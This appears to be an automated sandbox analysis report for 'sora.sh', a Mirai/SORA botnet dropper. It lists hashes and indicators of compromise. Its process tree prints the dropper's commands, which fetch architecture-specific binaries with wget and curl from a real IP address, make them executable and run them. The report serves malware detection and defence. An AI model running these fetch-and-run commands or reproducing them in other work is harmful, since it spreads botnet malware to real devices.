Analysis
- max time kernel: 34s
- max time network: 39s
- platform: debian-9_armhf
- resource: debian9-armhf-20240611-en
- resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 03-08-2024 05:14
Static task: static1
Behavioral task: behavioral1 (Sample: sora.sh, Resource: ubuntu1804-amd64-20240611-en)
Behavioral task: behavioral2 (Sample: sora.sh, Resource: debian9-armhf-20240611-en)
Behavioral task: behavioral3 (Sample: sora.sh, Resource: debian9-mipsbe-20240611-en)
General
- Target: sora.sh
- Size: 2KB
- MD5: fe9fcc98f0d2d8350fd699bb3edf3419
- SHA1: 5480c071e63cc7dd040b18ebc62c4a3cb7d5b5eb
- SHA256: faa68fe6ab7972ae17be23f4bed8c482a676935fcf257dca0cc6e51699e16213
- SHA512: 4994f7fc91e833a29b978f9ddd49657554ba0b4cf4c7e3f6d0d956447c45eb876f85e97644481267b58cd0172d471a0e6da89bba9998d14a22ebf499695d054c
Malware Config
Extracted: mirai / SORA
Signatures
- Executes dropped EXE (10 IoCs)
  Processes:
    ioc          pid   process
    /tmp/robben  685   robben
    /tmp/robben  698   robben
    /tmp/robben  704   robben
    /tmp/robben  715   robben
    /tmp/robben  726   robben
    /tmp/robben  742   robben
    /tmp/robben  753   robben
    /tmp/robben  767   robben
    /tmp/robben  787   robben
    /tmp/robben  825   robben
- Processes:
    resource     yara_rule
    /tmp/robben  upx
    /tmp/robben  upx
    /tmp/robben  upx
    /tmp/robben  upx
    /tmp/robben  upx
- Changes its process name (1 IoCs)
  Processes:
    description                                                       ioc                pid   process
    Changes the process name, possibly in an attempt to hide itself   mi35h115koc411kkm  825   robben
- Checks CPU configuration (1 TTPs, 10 IoCs)
  Checks CPU information that can indicate whether the system is a virtual machine.
  Processes:
    description               ioc            process
    File opened for reading   /proc/cpuinfo  curl
    File opened for reading   /proc/cpuinfo  curl
    File opened for reading   /proc/cpuinfo  curl
    File opened for reading   /proc/cpuinfo  curl
    File opened for reading   /proc/cpuinfo  curl
    File opened for reading   /proc/cpuinfo  curl
    File opened for reading   /proc/cpuinfo  curl
    File opened for reading   /proc/cpuinfo  curl
    File opened for reading   /proc/cpuinfo  curl
    File opened for reading   /proc/cpuinfo  curl
- Reads runtime system information (22 IoCs)
  Reads data from the /proc virtual filesystem.
  Processes:
    description               ioc                             process
    File opened for reading   /proc/sys/crypto/fips_enabled   curl
    File opened for reading   /proc/sys/crypto/fips_enabled   curl
    File opened for reading   /proc/self/auxv                 curl
    File opened for reading   /proc/self/auxv                 curl
    File opened for reading   /proc/sys/crypto/fips_enabled   curl
    File opened for reading   /proc/self/auxv                 curl
    File opened for reading   /proc/self/auxv                 curl
    File opened for reading   /proc/self/auxv                 curl
    File opened for reading   /proc/sys/crypto/fips_enabled   curl
    File opened for reading   /proc/sys/crypto/fips_enabled   curl
    File opened for reading   /proc/self/auxv                 curl
    File opened for reading   /proc/self/auxv                 curl
    File opened for reading   /proc/self/auxv                 curl
    File opened for reading   /proc/sys/crypto/fips_enabled   curl
    File opened for reading   /proc/sys/crypto/fips_enabled   curl
    File opened for reading   /proc/self/exe                  robben
    File opened for reading   /proc/self/auxv                 curl
    File opened for reading   /proc/sys/crypto/fips_enabled   curl
    File opened for reading   /proc/self/auxv                 curl
    File opened for reading   /proc/sys/crypto/fips_enabled   curl
    File opened for reading   /proc/sys/crypto/fips_enabled   curl
    File opened for reading   /proc/self/exe                  robben
- Writes file to tmp directory (19 IoCs)
  Malware often drops required files in the /tmp directory.
  Processes:
    description                    ioc               process
    File opened for modification   /tmp/sora.mips    wget
    File opened for modification   /tmp/sora.x86_64  curl
    File opened for modification   /tmp/sora.arm6    wget
    File opened for modification   /tmp/sora.mips    curl
    File opened for modification   /tmp/sora.x86_64  wget
    File opened for modification   /tmp/sora.mpsl    wget
    File opened for modification   /tmp/sora.x86     wget
    File opened for modification   /tmp/sora.x86     curl
    File opened for modification   /tmp/robben       sora.sh
    File opened for modification   /tmp/sora.i468    curl
    File opened for modification   /tmp/sora.i686    wget
    File opened for modification   /tmp/sora.arm4    curl
    File opened for modification   /tmp/sora.arm5    wget
    File opened for modification   /tmp/sora.arm5    curl
    File opened for modification   /tmp/sora.arm7    wget
    File opened for modification   /tmp/sora.arm7    curl
    File opened for modification   /tmp/sora.i686    curl
    File opened for modification   /tmp/sora.mpsl    curl
    File opened for modification   /tmp/sora.arm6    curl
Processes
- /tmp/sora.sh  (cmd: /tmp/sora.sh)  PID:659
    - Writes file to tmp directory
  - /usr/bin/wget  (cmd: wget http://91.92.252.2/bins/sora.x86)  PID:666
      - Writes file to tmp directory
  - /usr/bin/curl  (cmd: curl -O http://91.92.252.2/bins/sora.x86)  PID:672
      - Checks CPU configuration
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/cat  (cmd: cat sora.x86)  PID:682
  - /bin/chmod  (cmd: chmod +x robben sora.sh sora.x86 systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-ceP5dY)  PID:684
  - /tmp/robben  (cmd: ./robben Payload)  PID:685
      - Executes dropped EXE
  - /usr/bin/wget  (cmd: wget http://91.92.252.2/bins/sora.mips)  PID:687
      - Writes file to tmp directory
  - /usr/bin/curl  (cmd: curl -O http://91.92.252.2/bins/sora.mips)  PID:691
      - Checks CPU configuration
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/cat  (cmd: cat sora.mips)  PID:696
  - /bin/chmod  (cmd: chmod +x robben sora.mips sora.sh sora.x86 systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-ceP5dY)  PID:697
  - /tmp/robben  (cmd: ./robben Payload)  PID:698
      - Executes dropped EXE
  - /usr/bin/wget  (cmd: wget http://91.92.252.2/bins/sora.x86_64)  PID:700
      - Writes file to tmp directory
  - /usr/bin/curl  (cmd: curl -O http://91.92.252.2/bins/sora.x86_64)  PID:701
      - Checks CPU configuration
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/cat  (cmd: cat sora.x86_64)  PID:702
  - /bin/chmod  (cmd: chmod +x robben sora.mips sora.sh sora.x86 sora.x86_64 systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-ceP5dY)  PID:703
  - /tmp/robben  (cmd: ./robben Payload)  PID:704
      - Executes dropped EXE
  - /usr/bin/wget  (cmd: wget http://91.92.252.2/bins/sora.i468)  PID:707
  - /usr/bin/curl  (cmd: curl -O http://91.92.252.2/bins/sora.i468)  PID:709
      - Checks CPU configuration
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/cat  (cmd: cat sora.i468)  PID:713
  - /bin/chmod  (cmd: chmod +x robben sora.i468 sora.mips sora.sh sora.x86 sora.x86_64 systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-ceP5dY)  PID:714
  - /tmp/robben  (cmd: ./robben Payload)  PID:715
      - Executes dropped EXE
  - /usr/bin/wget  (cmd: wget http://91.92.252.2/bins/sora.i686)  PID:717
      - Writes file to tmp directory
  - /usr/bin/curl  (cmd: curl -O http://91.92.252.2/bins/sora.i686)  PID:720
      - Checks CPU configuration
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/cat  (cmd: cat sora.i686)  PID:724
  - /bin/chmod  (cmd: chmod +x robben sora.i468 sora.i686 sora.mips sora.sh sora.x86 sora.x86_64 systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-ceP5dY)  PID:725
  - /tmp/robben  (cmd: ./robben Payload)  PID:726
      - Executes dropped EXE
  - /usr/bin/wget  (cmd: wget http://91.92.252.2/bins/sora.mpsl)  PID:729
      - Writes file to tmp directory
  - /usr/bin/curl  (cmd: curl -O http://91.92.252.2/bins/sora.mpsl)  PID:735
      - Checks CPU configuration
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/cat  (cmd: cat sora.mpsl)  PID:738
  - /bin/chmod  (cmd: chmod +x robben sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64 systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-ceP5dY)  PID:740
  - /tmp/robben  (cmd: ./robben Payload)  PID:742
      - Executes dropped EXE
  - /usr/bin/wget  (cmd: wget http://91.92.252.2/bins/sora.arm4)  PID:744
  - /usr/bin/curl  (cmd: curl -O http://91.92.252.2/bins/sora.arm4)  PID:747
      - Checks CPU configuration
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/cat  (cmd: cat sora.arm4)  PID:750
  - /bin/chmod  (cmd: chmod +x robben sora.arm4 sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64 systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-ceP5dY)  PID:752
  - /tmp/robben  (cmd: ./robben Payload)  PID:753
      - Executes dropped EXE
  - /usr/bin/wget  (cmd: wget http://91.92.252.2/bins/sora.arm5)  PID:754
      - Writes file to tmp directory
  - /usr/bin/curl  (cmd: curl -O http://91.92.252.2/bins/sora.arm5)  PID:758
      - Checks CPU configuration
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/cat  (cmd: cat sora.arm5)  PID:764
  - /bin/chmod  (cmd: chmod +x robben sora.arm4 sora.arm5 sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64 systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-ceP5dY)  PID:766
  - /tmp/robben  (cmd: ./robben Payload)  PID:767
      - Executes dropped EXE
  - /usr/bin/wget  (cmd: wget http://91.92.252.2/bins/sora.arm6)  PID:768
      - Writes file to tmp directory
  - /usr/bin/curl  (cmd: curl -O http://91.92.252.2/bins/sora.arm6)  PID:782
      - Checks CPU configuration
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/cat  (cmd: cat sora.arm6)  PID:785
  - /bin/chmod  (cmd: chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64 systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-ceP5dY)  PID:786
  - /tmp/robben  (cmd: ./robben Payload)  PID:787
      - Executes dropped EXE
      - Reads runtime system information
  - /usr/bin/wget  (cmd: wget http://91.92.252.2/bins/sora.arm7)  PID:788
      - Writes file to tmp directory
  - /usr/bin/curl  (cmd: curl -O http://91.92.252.2/bins/sora.arm7)  PID:822
      - Checks CPU configuration
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/cat  (cmd: cat sora.arm7)  PID:823
  - /bin/chmod  (cmd: chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64)  PID:824
  - /tmp/robben  (cmd: ./robben Payload)  PID:825
      - Executes dropped EXE
      - Changes its process name
      - Reads runtime system information
  - /usr/bin/wget  (cmd: wget http://91.92.252.2/bins/sora.ppc)  PID:826
Network
MITRE ATT&CK Enterprise v15
Downloads